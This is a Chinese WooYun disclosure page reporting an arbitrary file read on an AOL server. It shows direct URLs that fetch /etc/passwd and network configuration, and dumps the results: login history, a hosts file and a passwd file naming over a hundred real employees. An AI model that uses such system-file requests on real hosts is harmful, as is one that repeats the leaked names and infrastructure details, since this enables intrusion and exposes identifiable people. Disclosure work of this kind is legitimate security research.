当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093786

漏洞标题:AOL某分站任意系统文件读取漏洞

相关厂商:aol.com

漏洞作者: 猪猪侠

提交时间:2015-02-03 11:43

修复时间:2015-03-20 11:44

公开时间:2015-03-20 11:44

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-03: 细节已通知厂商并且等待厂商处理中
2015-02-05: 厂商已经确认,细节仅向厂商公开
2015-02-15: 细节向核心白帽子及相关领域专家公开
2015-02-25: 细节向普通白帽子公开
2015-03-07: 细节向实习白帽子公开
2015-03-20: 细节向公众公开

简要描述:

AOL某分站任意系统文件读取漏洞

详细说明:

https://www.shodan.io/host/149.174.97.92

149.174.97.92
http://huffsmith-shared-a-atc.evip.aol.com/


last

root     pts/0        jenkins-m01.ihos Sat Jan 24 06:48 - 06:48  (00:00)    
root     pts/0        jenkins-m01.ihos Sat Jan 24 06:48 - 06:48  (00:00)    
root     pts/0        jenkins-m01.ihos Wed Jan  7 00:48 - 00:48  (00:00)    
root     pts/0        jenkins-m01.ihos Wed Jan  7 00:48 - 00:48  (00:00)    
root     pts/0        jenkins-m01.ihos Wed Jan  7 00:37 - 00:37  (00:00)    
root     pts/0        jenkins-m01.ihos Wed Jan  7 00:37 - 00:37  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Dec 23 14:27 - 14:27  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Dec 23 14:27 - 14:27  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Dec 23 14:21 - 14:21  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Dec 23 14:21 - 14:21  (00:00)    
reboot   system boot  2.6.32-431.20.5. Thu Oct  9 23:33 - 02:36 (107+03:03) 
root     pts/0        jenkins-m01.ihos Wed Oct  1 02:49 - 02:49  (00:00)    
root     pts/0        jenkins-m01.ihos Wed Oct  1 02:49 - 02:49  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Sep 30 23:21 - 23:22  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Sep 30 23:21 - 23:21  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Sep 30 05:38 - 05:40  (00:01)    
root     pts/0        jenkins-m01.ihos Tue Sep 30 05:38 - 05:38  (00:00)    
root     pts/0        jenkins-m01.ihos Fri Aug 22 22:29 - 22:29  (00:00)    
root     pts/0        jenkins-m01.ihos Fri Aug 22 22:29 - 22:29  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Aug 12 11:47 - 11:47  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Aug 12 11:47 - 11:47  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Aug 12 11:42 - 11:42  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Aug 12 11:42 - 11:42  (00:00)    
root     pts/0        jenkins-m01.ihos Fri Aug  1 23:39 - 23:40  (00:01)    
root     pts/0        jenkins-m01.ihos Fri Aug  1 23:39 - 23:39  (00:00)    
root     pts/0        jenkins-m01.ihos Fri Aug  1 00:15 - 00:16  (00:01)    
root     pts/0        jenkins-m01.ihos Fri Aug  1 00:15 - 00:15  (00:00)    
root     pts/0        jenkins-m01.ihos Tue Jul 29 06:13 - 06:14  (00:01)    
root     pts/0        jenkins-m01.ihos Tue Jul 29 06:13 - 06:13  (00:00)    
root     pts/0        jenkins-m01.ihos Mon Jul 28 22:53 - 22:55  (00:01)


http://149.174.97.92/etc/sysconfig/network

NETWORKING=yes
NETWORKING_IPV6=no
HOSTNAME=amp-prod-blogside-a108.ihost.aol.com
GATEWAY=205.188.29.254

http://149.174.97.92/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
postgres:x:26:26:PostgreSQL Server User:/home/postgres:/bin/bash
mysql:x:27:27:Mysql User:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smmsp:x:51:51:smmsp mail user:/var/spool/mqueue:/dev/null
piranha:x:60:60::/etc/sysconfig/ha:/dev/null
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
couchbase:x:477:494:couchbase system user:/opt/couchbase:/bin/sh
kim:x:478:1026:Kim Brennan:/home/kim:/bin/bash
saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
abrt:x:499:499::/etc/abrt:/sbin/nologin
shallett:x:781:1026:Stephen Hallett:/home/shallett:/bin/bash
zhou:x:945:1035:Yingying Zhou:/home/zhou:/bin/bash
russ:x:1833:1026:Russ DeLuca:/home/russ:/bin/bash
prjones:x:2308:1026:Peter Jones:/home/prjones:/bin/bash
lshoang:x:2386:1026:Lynn Hoang:/home/lshoang:/bin/bash
saunders:x:2597:1026:James Saunders:/home/saunders:/bin/bash
tpitts:x:2758:11062:Tom Pitts:/home/tpitts:/bin/bash
jingwu:x:3017:1026:Jing Wu:/home/jingwu:/bin/bash
kpettit:x:4572:1026:Kevin Pettit:/home/kpettit:/bin/bash
desaia:x:4700:20:Ed Desai:/home/desaia:/bin/bash
stolfi:x:4798:1026:Chris Stolfi:/home/stolfi:/bin/bash
vvsaxena:x:5175:1026:Vishal Saxena:/home/vvsaxena:/bin/bash
mmiranda:x:5217:1026:Maxie Miranda:/home/mmiranda:/bin/bash
eddeegan:x:5471:951:Edward Deegan:/home/eddeegan:/bin/bash
zgrodek:x:5479:1026:Renee Sribar:/home/zgrodek:/bin/bash
dhunn:x:5562:1026:David Hunninen:/home/dhunn:/bin/bash
toni:x:5857:1026:Toni Sanavullah:/home/toni:/bin/bash
pvelez:x:6012:1026:Peter Velez:/home/pvelez:/bin/bash
colmg:x:6077:1026:Colm Geraghty:/home/colmg:/bin/bash
mfbma:x:6529:1026:Brian Ayala:/home/mfbma:/bin/bash
rodneyp:x:6598:1026:Rodney Plomp:/home/rodneyp:/bin/bash
zhanglu:x:6817:60:Zhang Lu:/home/zhanglu:/bin/bash
mthornto:x:6933:1026:Michael Thornton:/home/mthornto:/bin/bash
stokesrk:x:7358:1026:Robb Stokes:/home/stokesrk:/bin/bash
gearoidr:x:7841:1026:Gearoid Rogers:/home/gearoidr:/bin/bash
bduddy:x:8565:1026:Brian Duddy:/home/bduddy:/bin/bash
roperry:x:8711:1026:Bobby Perry:/home/roperry:/bin/bash
willjw:x:8815:1026:William Won:/home/willjw:/bin/bash
ian:x:9035:1026:Ian Nakamura:/home/ian:/bin/bash
mdunbar:x:9148:1026:Matthew Dunbar:/home/mdunbar:/bin/bash
pemkes:x:9438:1026:Paul Emkes:/home/pemkes:/bin/bash
walkert:x:9546:1026:Travis Walker:/home/walkert:/bin/bash
shawnc:x:9995:1026:Shawn Carnell:/home/shawnc:/bin/bash
cgreen:x:12029:1026:Carl Green:/home/cgreen:/bin/bash
amico:x:12858:1026:John Amico:/home/amico:/bin/bash
vroytman:x:12955:1026:Vladimir Roytman:/home/vroytman:/bin/bash
jobi:x:13695:1026:JOBI:/home/jobi:/bin/bash
zacd:x:14432:1026:Zacariah DeLesDernier:/home/zacd:/bin/bash
patrickf:x:14495:1026:Patrick Fitzsimons:/home/patrickf:/bin/bash
mhanick:x:14789:1026:Mark Hanick:/home/mhanick:/bin/bash
imdbg:x:15272:1018:Brandon Goode:/home/imdbg:/bin/bash
jcain:x:16226:1026:Justin Cain:/home/jcain:/bin/bash
jcrane:x:16477:1026:Jonathan Crane:/home/jcrane:/bin/bash
shashik:x:16730:1026:Shashikiran Reddy:/home/shashik:/bin/bash
cfleming:x:16960:1026:Christopher Fleming:/home/cfleming:/bin/bash
ckhouri5:x:17613:1026:Christoph Khouri:/home/ckhouri5:/bin/bash
taraschk:x:17630:1026:Matthew Taraschke:/home/taraschk:/bin/bash
mohamed1:x:18676:1026:Mohamed Osman:/home/mohamed1:/bin/bash
dpadmin:x:18734:11337:PCS dpadmin:/home/dpadmin:/bin/bash
malang1:x:19148:1026:Suhale Malang Khader:/home/malang1:/bin/bash
madhurao:x:19238:1026:Madhusudan Rao:/home/madhurao:/bin/bash
sameer6:x:19464:1026:Sameer Patel:/home/sameer6:/bin/bash
rameshk2:x:19517:1026:Ramesh Kumar R:/home/rameshk2:/bin/bash
amitv:x:19573:1026:Amit Varde:/home/amitv:/bin/bash
gopinath:x:20352:1026:Gopinath Kalidass:/home/gopinath:/bin/bash
artz:x:20549:1026:Dave Artz:/home/artz:/bin/bash
venug:x:21433:1026:Venu Vejandla:/home/venug:/bin/bash
kkumar:x:21499:1026:Krishnakumar Subramanian:/home/kkumar:/bin/bash
rpokhare:x:21654:1026:Ranjan Pokharel:/home/rpokhare:/bin/bash
jannotta:x:21752:1026:Jeremy Jannotta:/home/jannotta:/bin/bash
mongodb:x:21780:11593:Default mongodb for COI:/home/mongodb:/bin/bash
nate:x:21870:1026:Nate Eagle:/home/nate:/bin/zsh
andykahn:x:22001:1026:Andy Kahn:/home/andykahn:/bin/bash
jmurillo:x:22092:1026:Jady Murillo:/home/jmurillo:/bin/bash
ptivnan:x:22109:1026:Patrick Tivnan:/home/ptivnan:/bin/bash
groman00:x:22117:1026:Greg Roman:/home/groman00:/bin/bash
rexfury:x:22207:1026:James Diss:/home/rexfury:/bin/bash
sparksm:x:22216:1026:Michael Sparks:/home/sparksm:/bin/zsh
abudri11:x:22306:1026:Abdullah Budri:/home/abudri11:/bin/bash
loglesby:x:22344:1026:Leah Oglesby:/home/loglesby:/bin/bash
georgew:x:22451:1026:George Henry Whitesides III:/home/georgew:/bin/bash
philipt:x:22486:1026:Tina Philip:/home/philipt:/bin/bash
scharles:x:22527:1026:Charles Sinclair:/home/scharles:/bin/bash
aminel:x:22543:1026:Amine Louati:/home/aminel:/bin/bash
ctoby:x:22546:1026:Cindy Toby:/home/ctoby:/bin/bash
jcobb29:x:22623:1026:Justin Cobb:/home/jcobb29:/bin/bash
skunchak:x:22642:1026:Sivaprasad Kunchakuri:/home/skunchak:/bin/bash
bhashimi:x:22647:1026:Belal Hashimi:/home/bhashimi:/bin/bash
paulv:x:22734:1026:Paul Vuchetich:/home/paulv:/bin/bash
rkhattar:x:22739:1026:Ralph Khattar:/home/rkhattar:/bin/bash
bbarek:x:22769:1026:Bahier Barekzoy:/home/bbarek:/bin/bash
imran12:x:22771:1026:Imran Hoosain:/home/imran12:/bin/bash
eamoncc:x:22798:1026:Eamon McCormack:/home/eamoncc:/bin/bash
dsegall:x:22887:1026:Daniel Segall:/home/dsegall:/bin/bash
ameira:x:22930:1026:Ameir Abdeldayem:/home/ameira:/bin/bash
phanin:x:23037:1026:Phanindra Golkonda:/home/phanin:/bin/bash
eladamit:x:23051:1026:Elad Amit:/home/eladamit:/bin/bash
ewolk:x:23132:1026:Ethan Wolkowicz:/home/ewolk:/bin/bash
srimola:x:23264:1026:Stefan Rimola:/home/srimola:/bin/bash
ampsmith:x:23387:1026:Jacob Smith:/home/ampsmith:/bin/bash
zkelly44:x:23432:1026:ZacK Kelly:/home/zkelly44:/bin/bash
ronnys:x:23444:1026:Ronny Sapir:/home/ronnys:/bin/bash
jdesmet:x:23549:1026:Jordan Desmet:/home/jdesmet:/bin/bash
averkhov:x:23639:1026:Alex Verkhovtsev:/home/averkhov:/bin/bash
alonbeck:x:23657:1026:Alon Becker:/home/alonbeck:/bin/bash
niquesh2:x:23666:1026:Shanique Davis:/home/niquesh2:/bin/bash
adwilli:x:23696:1026:Adrian Williams:/home/adwilli:/bin/bash
samquin:x:23725:1026:Samantha Quinones:/home/samquin:/bin/bash
ehanit14:x:23768:1026:Erez Hanit:/home/ehanit14:/bin/bash
ccannell:x:23782:1026:Chad Cannell:/home/ccannell:/bin/bash
chensha:x:23794:1026:Chen Shaulian:/home/chensha:/bin/bash
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

漏洞证明:

# Do not  remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
149.174.108.111 amp-prod-blogside-a114.ihost.aol.com amp-prod-blogside-a114.ihost.aol amp-prod-blogside-a114.ihost amp-prod-blogside-a114


修复方案:

重新配置

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-02-05 02:42

厂商回复:

最新状态:

2015-02-05:Please remove this link and do NOT publish this vulnerability until we have had a chance to correct the issue.

漏洞评价:

评论

  1. 2015-01-24 22:18 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    沙发

  2. 2015-01-24 22:20 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    板凳

  3. 2015-01-24 22:27 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    aol是外国的吧

  4. 2015-01-24 23:13 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @动后河 美国在线,牛逼

  5. 2015-01-25 00:18 | f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)

    这是要拉国外大公司来大乌云的节奏?

  6. 2015-01-25 09:03 | 小呆呆 ( 实习白帽子 | Rank:41 漏洞数:7 | 每次有人骂我猪我都说我偶像也是猪)

    aol是啥

  7. 2015-01-25 16:35 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    American Online

  8. 2015-01-26 12:42 | aNsSe ( 路人 | Rank:0 漏洞数:2 | 独自一人走天下)

    冒泡

  9. 2015-01-26 15:11 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    cool

  10. 2015-01-26 17:20 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    猪哥厉害

  11. 2015-01-26 17:21 | 好人 ( 路人 | Rank:13 漏洞数:6 | 多少人曾爱慕你年轻的容颜)

    3000rank

  12. 2015-01-29 18:43 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    3000rank

  13. 2015-01-31 22:02 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:32 )

    膜拜猪哥

  14. 2015-02-03 11:44 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    aol来认领漏洞啦。猪哥又为促进歪果仁学习中文做出来贡献

  15. 2015-02-03 11:47 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    Thank you for the detailed report, we will evaluate this and respond as needed.

  16. 2015-02-03 12:00 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    大公司都被猪猪侠拉进来了。

  17. 2015-02-03 13:55 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  18. 2015-02-03 22:13 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    3W rank

  19. 2015-02-05 07:39 | Dusk ( 路人 | Rank:1 漏洞数:1 | 小白 大牛别打我。。!)

    3E rank

  20. 2015-02-05 08:19 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    这意思是 不要公开漏洞直到我们确认了来?

  21. 2015-02-05 08:57 | fuckadmin ( 普通白帽子 | Rank:476 漏洞数:72 | 千里之堤溃于蚁穴)

    请删除此链接,不公布这个漏洞直到我们有机会纠正问题。厂商需要个会中文的哥们。@aol.com

  22. 2015-02-05 10:30 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    请删除这个链接,不公布这个漏洞,直到我们有一个机会来纠正这个问题。

  23. 2015-02-05 13:43 | 小呆呆 ( 实习白帽子 | Rank:41 漏洞数:7 | 每次有人骂我猪我都说我偶像也是猪)

    这厂商回复有点强势啊

  24. 2015-02-05 14:47 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    看来是不懂规则啊。

  25. 2015-02-08 21:30 | jeary ( 普通白帽子 | Rank:296 漏洞数:106 | (:‮.kcaH eb nac gnihtynA))

    +999999999999999999

  26. 2015-02-08 21:38 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    厂商回复霸气啊

  27. 2015-02-10 10:57 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    其实我觉得没有必要去纠结这个厂商回复。中文和英文的表达方式本来就有不同,而且你们肯定自己翻译的是正确的么?

  28. 2015-02-11 21:33 | Power ( 实习白帽子 | Rank:54 漏洞数:22 | 还需要等待.........)

    .....

  29. 2015-02-12 09:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    乌云一直不都是这么做的么

  30. 2015-02-25 13:55 | 你大爷在此 百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们 大家好 我是王尼玛)

    猪哥 你的神器呢? 来一发吧

  31. 2015-03-06 16:43 | 朵宝宝 ( 路人 | Rank:6 漏洞数:6 | sorry)

    猪哥! 上神器

  32. 2015-07-19 16:11 | sOnsec ( 实习白帽子 | Rank:93 漏洞数:24 | 安全是什么...)

    666

  33. 2015-07-20 21:37 | sOnsec ( 实习白帽子 | Rank:93 漏洞数:24 | 安全是什么...)

    来学习